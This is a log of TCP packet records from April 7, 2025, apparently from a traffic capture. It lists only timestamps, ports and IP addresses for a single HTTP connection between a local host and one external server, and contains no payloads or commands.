Apr 7, 2025 08:37:04.649092913 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.649137020 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.990834951 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.990969896 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.990994930 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991014957 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991018057 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991040945 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991061926 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991067886 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991089106 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991102934 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991112947 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991153002 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991167068 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991189003 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991224051 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991231918 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991246939 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991271019 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991288900 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991296053 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991327047 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991336107 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991352081 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991374969 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991393089 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991499901 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991558075 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991699934 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991720915 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991746902 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991766930 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991776943 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991797924 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991812944 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991879940 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991904020 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991920948 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991945028 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991950035 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.991967916 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.991972923 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.992003918 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.992018938 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.992029905 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.992072105 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.330809116 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.330840111 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.330863953 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.330878973 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.330921888 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.330950975 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331021070 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331046104 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331068039 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331073046 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331090927 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331104040 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331121922 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331135035 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331147909 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331161976 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331181049 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331187010 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331204891 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331211090 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331234932 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331243992 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331260920 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331284046 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331285954 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331309080 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331315041 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331332922 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331350088 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331357002 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331381083 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331383944 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331404924 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331412077 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331429958 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331442118 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331463099 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331494093 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331512928 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331540108 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331557989 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331559896 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331587076 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331587076 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331614017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331615925 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331634998 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331640005 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331660032 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331665993 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331680059 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331691027 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331712008 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331716061 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331733942 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331741095 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331762075 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331767082 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331783056 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331794024 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331811905 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331824064 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331846952 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331852913 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331873894 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331878901 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331891060 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331897974 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331914902 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331927061 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331952095 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331955910 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.331973076 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.331981897 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332004070 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332005978 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332026958 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332032919 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332056999 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332070112 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332082033 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332093954 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332112074 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332133055 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332139015 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332165003 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332182884 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332189083 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332211018 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332211971 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332233906 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332236052 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332272053 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332284927 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332304001 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332345009 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332350969 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332370043 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332391024 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332396030 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332417011 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332421064 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332448006 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332468033 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332494020 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332519054 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332539082 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332560062 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332560062 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332586050 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332607031 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332612038 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332628012 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332628965 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332655907 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332662106 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.332678080 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.332704067 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.670533895 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.670563936 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.670593977 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.670607090 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.670654058 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.670654058 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.673314095 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673419952 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673437119 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.673480988 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673527002 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.673568964 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673615932 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673666954 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.673737049 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673820019 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673842907 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673868895 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.673886061 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673911095 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673930883 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673932076 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.673959017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.673974037 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.673984051 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674006939 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674026012 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674027920 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674053907 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674073935 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674077988 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674098969 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674124956 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674127102 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674148083 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674164057 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674173117 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674195051 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674217939 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674220085 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674243927 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674263000 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674264908 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674293041 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674307108 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674313068 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674339056 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674357891 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674362898 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674387932 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674411058 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.674413919 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674453020 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674473047 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.674530983 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:05.941848040 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:05.942071915 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.010843992 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.010968924 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.011141062 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.013020992 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.013046980 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.013108969 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015129089 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015146017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015182018 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015202999 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015203953 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015264034 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015654087 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015674114 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015700102 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015721083 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015733957 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015758991 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015779972 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015789986 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015811920 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015825033 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015832901 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015858889 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015877962 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015889883 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015914917 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015937090 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015948057 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015971899 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.015990973 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.015995979 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016022921 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016038895 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.016045094 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016067982 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016087055 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.016089916 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016117096 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016129971 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.016139030 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016161919 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016184092 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016185045 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.016223907 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016230106 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.016247034 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.016304016 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.350598097 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.350738049 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.350904942 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.352832079 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.352890968 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.352955103 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.355947971 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.355968952 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.355998039 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356024981 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356087923 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356121063 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356142998 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356147051 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356172085 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356187105 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356189013 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356228113 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356235027 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356292963 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356317997 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356344938 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356404066 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356426954 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356451988 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356453896 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356491089 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356514931 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356538057 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356564045 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356585979 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356592894 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356614113 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356637955 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356657982 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356674910 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356703043 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356705904 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356724024 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356758118 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356762886 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356781006 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356813908 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356825113 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356864929 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356878996 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.356920958 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356944084 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.356971025 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.400336027 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.695617914 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.695650101 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.695684910 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.695710897 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.695857048 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.695857048 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.698950052 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699027061 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699088097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699110031 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699152946 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699177980 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699201107 CEST	80	49691	161.248.239.119	192.168.2.5
